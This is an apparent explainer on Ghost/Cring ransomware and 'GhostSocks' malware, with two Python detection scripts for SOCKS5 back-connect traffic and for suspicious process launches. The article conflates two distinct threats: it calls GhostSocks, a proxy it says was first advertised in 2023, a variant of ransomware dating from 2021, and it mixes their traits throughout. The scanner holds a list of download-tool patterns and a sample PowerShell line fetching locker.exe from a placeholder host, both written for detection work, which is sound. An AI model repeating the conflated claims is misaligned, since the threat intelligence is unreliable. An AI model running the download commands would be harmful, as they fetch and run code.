Introduction

The GhostSocks malware [3], a variant of the Ghost ransomware also known as Cring, poses a significant threat to a wide range of organizations worldwide. This malware, which uses SOCKS5 proxying to bypass detection systems and geographic restrictions [3], has been actively targeting various sectors since its identification in early 2021. The Cybersecurity and Infrastructure Security Agency (CISA) [2] [3], the Federal Bureau of Investigation (FBI) [2], and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a joint advisory to raise awareness and provide guidance on mitigating this threat.

Description

The GhostSocks malware has targeted organizations across over 70 countries [3], primarily focusing on government networks, critical infrastructure [2] [3] [4] [5], educational institutions, healthcare facilities, technology companies [1], religious organizations [1] [4], and various small to medium-sized enterprises. The group behind GhostSocks exploits common software vulnerabilities using publicly available code [1], making it a significant threat to a wide range of entities [1]. The malware exploits unpatched vulnerabilities in internet-facing devices [2], weak credentials [3], and outdated security configurations [3], often targeting known weaknesses in Fortinet appliances, Adobe ColdFusion [4] [5], and Microsoft SharePoint and Exchange servers [4]. Many of these vulnerabilities have remained unpatched for over a decade [2], highlighting the urgent need for effective patch management.

Operating under a Malware-as-a-Service model [3], GhostSocks is distributed alongside the LummaC2 infostealer [3], which enhances its post-exploitation capabilities [3]. The malware was first advertised on Russian-language forums in October 2023 and has since attracted English-speaking cybercriminals [3]. For a licensing fee of $150 in Bitcoin [3], attackers can access customizable builds of GhostSocks that incorporate obfuscation techniques to hinder analysis [3]. It primarily functions by establishing SOCKS5 back-connect proxies [3], allowing attackers to route traffic through compromised devices [3], thereby masking their activities and bypassing IP-based security measures [3].

GhostSocks employs a relay-based command-and-control (C2) infrastructure [3], using Tier 1 and Tier 2 servers to obscure communication [3]. Researchers have identified critical C2 infrastructure hosted on VDSina [3], a UAE-based provider known for commercial VPNs and proxy services [3]. The group's attacks are opportunistic, often encrypting files on the same day they breach a network [5], and they exploit common vulnerabilities and exposures (CVEs) for initial access. Notable vulnerabilities exploited include CVE-2018-13379 (Fortinet FortiOS) [5], CVE-2010-2861 and CVE-2009-3960 (Adobe ColdFusion) [5], CVE-2019-0604 (Microsoft SharePoint) [5], and several CVEs affecting Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) [5]. It is estimated that 34% of ransomware attacks leverage such vulnerabilities for initial access [2], with the Microsoft Exchange vulnerabilities often being exploited through ProxyShell attack chains.
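The two paragraphs above describe the SOCKS5 back-connect proxy behaviour: a compromised host dials out to a relay and then serves SOCKS5 to it, so the remote relay, not the victim, plays the SOCKS5 client role on a connection the victim opened. The following detection sketch is an added example, not code from the article or from any of the cited sources. It parses SOCKS5 client messages (the greeting and the CONNECT/BIND/UDP ASSOCIATE request, as defined in RFC 1928) out of captured payload bytes and flags sessions where the internal host initiated the TCP connection yet the remote peer is the one sending SOCKS5 client messages. The flow records, the `local_initiated` / `remote_to_local` / `local_to_remote` field names, the `build_request` helper and the sample captures are all constructed for this example; the addresses are placeholders.

```python
"""Added example: spot SOCKS5 back-connect proxying in captured TCP payloads.
A normal outbound SOCKS5 client sends the greeting/request itself. In the
back-connect case the local host opened the session but the *remote* peer
sends the SOCKS5 client messages. All sample data below is constructed."""
import ipaddress
import struct

SOCKS_VERSION = 0x05
CMD_NAMES = {1: "CONNECT", 2: "BIND", 3: "UDP_ASSOCIATE"}


def parse_greeting(buf):
    """Parse a SOCKS5 client greeting (VER, NMETHODS, METHODS...).
    Returns (methods, bytes_consumed) or None if this is not a greeting."""
    if len(buf) < 2 or buf[0] != SOCKS_VERSION:
        return None
    n = buf[1]
    if n == 0 or len(buf) < 2 + n:
        return None
    return list(buf[2:2 + n]), 2 + n


def parse_request(buf):
    """Parse a SOCKS5 request (VER, CMD, RSV, ATYP, DST.ADDR, DST.PORT).
    Returns {'cmd', 'addr', 'port'} or None if the bytes do not fit RFC 1928."""
    if len(buf) < 4 or buf[0] != SOCKS_VERSION or buf[2] != 0x00:
        return None
    cmd, atyp = buf[1], buf[3]
    pos = 4
    if atyp == 0x01:                      # IPv4 address, 4 bytes
        if len(buf) < pos + 4:
            return None
        addr = str(ipaddress.IPv4Address(buf[pos:pos + 4]))
        pos += 4
    elif atyp == 0x03:                    # domain name, length-prefixed
        if len(buf) < pos + 1:
            return None
        ln = buf[pos]
        pos += 1
        if len(buf) < pos + ln:
            return None
        addr = buf[pos:pos + ln].decode("ascii", "replace")
        pos += ln
    elif atyp == 0x04:                    # IPv6 address, 16 bytes
        if len(buf) < pos + 16:
            return None
        addr = str(ipaddress.IPv6Address(buf[pos:pos + 16]))
        pos += 16
    else:
        return None
    if len(buf) < pos + 2:
        return None
    port = struct.unpack("!H", buf[pos:pos + 2])[0]
    return {"cmd": CMD_NAMES.get(cmd, f"unknown({cmd})"), "addr": addr, "port": port}


def parse_client_stream(buf):
    """Parse greeting followed by request from one direction of a stream."""
    greeting = parse_greeting(buf)
    if greeting is None:
        return None
    methods, consumed = greeting
    return {"methods": methods, "request": parse_request(buf[consumed:])}


def classify_flow(flow):
    """Return a verdict for one constructed flow record (field names assumed)."""
    remote_as_client = parse_client_stream(flow["remote_to_local"])
    local_as_client = parse_client_stream(flow["local_to_remote"])
    if flow["local_initiated"] and remote_as_client:
        req = remote_as_client["request"]
        target = f'{req["cmd"]} {req["addr"]}:{req["port"]}' if req else "greeting only"
        return f"BACKCONNECT: remote peer driving SOCKS5 through local host ({target})"
    if local_as_client:
        return "INFO: local host using an outbound SOCKS5 proxy"
    return "none"


def build_request(addr, port, cmd=1):
    """Construct a SOCKS5 request; used only to build the sample captures."""
    try:
        ip = ipaddress.ip_address(addr)
        body = bytes([0x01 if ip.version == 4 else 0x04]) + ip.packed
    except ValueError:
        name = addr.encode("ascii")
        body = b"\x03" + bytes([len(name)]) + name
    return bytes([SOCKS_VERSION, cmd, 0x00]) + body + struct.pack("!H", port)


GREETING_NOAUTH = b"\x05\x01\x00"         # one method offered: no authentication

# Constructed sample flows (placeholder addresses, not real telemetry).
SAMPLE_FLOWS = [
    {"id": "flow-1", "local_initiated": True,   # victim dialed out, relay drives SOCKS5
     "remote_to_local": GREETING_NOAUTH + build_request("placeholder.invalid", 443),
     "local_to_remote": b"\x05\x00" + b"\x05\x00\x00\x01" + b"\x00" * 4 + b"\x00\x00"},
    {"id": "flow-2", "local_initiated": True,   # ordinary TLS, not SOCKS at all
     "remote_to_local": b"\x16\x03\x03\x00\x2a",
     "local_to_remote": b"\x16\x03\x01\x00\xf5"},
    {"id": "flow-3", "local_initiated": True,   # local host is a normal SOCKS5 client
     "remote_to_local": b"\x05\x00",
     "local_to_remote": GREETING_NOAUTH + build_request("192.0.2.10", 8080)},
]

if __name__ == "__main__":
    for flow in SAMPLE_FLOWS:
        print(flow["id"], "->", classify_flow(flow))
```

The direction check is what distinguishes a back-connect proxy from legitimate proxy use: the same SOCKS5 bytes are benign when the internal host sends them to a corporate proxy and suspicious when an external peer sends them over a connection the internal host opened. Feeding this real reassembled streams would require a capture tool to supply the direction fields, which this example assumes.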

Ghost actors [2] [4] [5], believed to be based in China and active for approximately four years [5], are known for their rapid attack deployment. They typically initiate attacks through spear-phishing emails containing links to malicious websites or attachments that install ransomware [1]. Once they gain access [4], they use Command Prompt or PowerShell to download and execute malware [4], with observed ransomware file names including cring.exe, ghost.exe, elysium0.exe, and locker.exe [4]. They may also perform additional actions to collect or alter passwords and to elevate privileges [4]. Victims are unable to access their data without the encryption key [4], and the group leaves a ransom note threatening to exfiltrate and leak sensitive data if payment is not made [4]. Ransom demands can range from tens of thousands to hundreds of thousands of dollars [1]. US authorities indicate that Ghost actors tend to abandon attacks when faced with strong defenses [5], preferring to move on to easier targets [5].

To defend against Ghost ransomware attacks [5], organizations are advised to implement several key actions: maintain regular, known-good system backups stored offline [2]; apply timely security updates to operating systems, software, and firmware [1] [2] [3] [4] [5]; segment networks to limit lateral movement from initially infected devices; enforce phishing-resistant multi-factor authentication (MFA) for privileged accounts and email services; enhance email security; monitor for unusual commands, scripts, and programs that may indicate Ghost activity [2] [5]; create application allowlists; identify abnormal network activity; disable unused ports; and conduct user training on phishing awareness. The FBI notes that Ghost typically downloads less than 100 GB of data to servers associated with the group [4], underscoring the importance of vigilance and proactive security measures in an increasingly interconnected digital landscape.
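The monitoring recommendation above ("unusual commands, scripts, and programs") is concrete enough to turn into a rule when combined with the earlier description of Command Prompt or PowerShell being used to download and execute the malware, and the file names cring.exe, ghost.exe, elysium0.exe and locker.exe. The script below is an added example, not code from the article, the advisory, or any cited source. It runs over a handful of constructed process-creation log lines (a simple `key="value"` format assumed for the example; real telemetry such as Sysmon or EDR events would need their own parser) and reports events that match either the listed file names or a shell interpreter launched with a download or encoded-command pattern. Hosts, paths and the URL are placeholders.

```python
"""Added example: flag process-creation events that match the behaviour the
advisory describes. Log lines, host names and URLs below are constructed."""
import re
from dataclasses import dataclass

# File names given in the article (attributed there to the joint advisory).
KNOWN_RANSOMWARE_NAMES = {"cring.exe", "ghost.exe", "elysium0.exe", "locker.exe"}

# Interpreters the article says are used to fetch and run the malware.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Command-line fragments typical of a download-and-execute step. These are
# generic living-off-the-land download patterns, not Ghost-specific strings.
DOWNLOAD_PATTERNS = [
    re.compile(r"invoke-webrequest", re.I),
    re.compile(r"downloadstring|downloadfile", re.I),
    re.compile(r"\bcurl\b", re.I),
    re.compile(r"\bcertutil\b.*-urlcache", re.I),
    re.compile(r"\bbitsadmin\b.*/transfer", re.I),
]
# PowerShell's -EncodedCommand and its short forms.
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)


@dataclass
class Alert:
    host: str
    image: str
    reason: str


def parse_line(line):
    """Parse one constructed 'key=value' / 'key="value"' log line into a dict."""
    fields = {}
    for m in re.finditer(r'(\w+)=("([^"]*)"|(\S+))', line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def evaluate(event):
    """Return the reasons an event looks like Ghost-style activity (empty if none)."""
    reasons = []
    image = event.get("image", "").lower()
    cmd = event.get("cmdline", "")
    name = image.rsplit("\\", 1)[-1]          # basename of the executed image
    if name in KNOWN_RANSOMWARE_NAMES:
        reasons.append(f"known ransomware file name: {name}")
    if name in SHELLS:
        if any(p.search(cmd) for p in DOWNLOAD_PATTERNS):
            reasons.append(f"{name} used to download content")
        if ENCODED_FLAG.search(cmd):
            reasons.append(f"{name} launched with an encoded command")
    return reasons


def scan(lines):
    """Run evaluate() over every log line and collect alerts."""
    alerts = []
    for line in lines:
        event = parse_line(line)
        for reason in evaluate(event):
            alerts.append(Alert(event.get("host", "?"), event.get("image", "?"), reason))
    return alerts


# Constructed sample events; the base64 blob and URL are placeholders.
SAMPLE_LOG = [
    'host=ws01 image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd.exe /c dir"',
    'host=ws02 image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -enc QQBCAEMA"',
    'host=srv01 image="C:\\Users\\Public\\cring.exe" cmdline="cring.exe"',
    'host=ws03 image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe Invoke-WebRequest http://placeholder.invalid/x '
    '-OutFile C:\\Users\\Public\\locker.exe"',
    'host=ws04 image="C:\\Program Files\\App\\app.exe" cmdline="app.exe --update"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert.host}: {alert.image} -> {alert.reason}")
```

On the sample data three of the five events alert: the encoded PowerShell launch, the execution of a file named cring.exe, and the PowerShell download that writes locker.exe. The plain `cmd.exe /c dir` and the application updater do not, which is the point of keying the download patterns to the shell interpreters rather than matching them everywhere. Name-based rules are the weakest part of this logic, since operators can rename binaries; the shell-plus-download rule generalizes better and is what "monitor for unusual commands and scripts" amounts to in practice.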

Conclusion

The GhostSocks malware represents a formidable challenge to cybersecurity, exploiting long-standing vulnerabilities and leveraging sophisticated evasion techniques. Organizations must prioritize robust security measures, including regular updates and employee training, to mitigate the risk of attack [1]. As cyber threats continue to evolve, maintaining a proactive and adaptive security posture will be crucial in safeguarding sensitive data and ensuring operational resilience.

References

[1] https://www.newsduck.in/technology/fbi-warns-of-chinese-ransomware-group-ghost-issues-advisory/
[2] https://www.cohesity.com/blogs/ghost-ransomware-gang/
[3] https://www.cybersecurityintelligence.com/blog/ghostsocks-malware-can-avoid-detection-systems-8283.html
[4] https://www.securedatarecovery.com/blog/how-to-protect-data-from-ransomware
[5] https://www.hipaaguide.net/ghost-ransomware/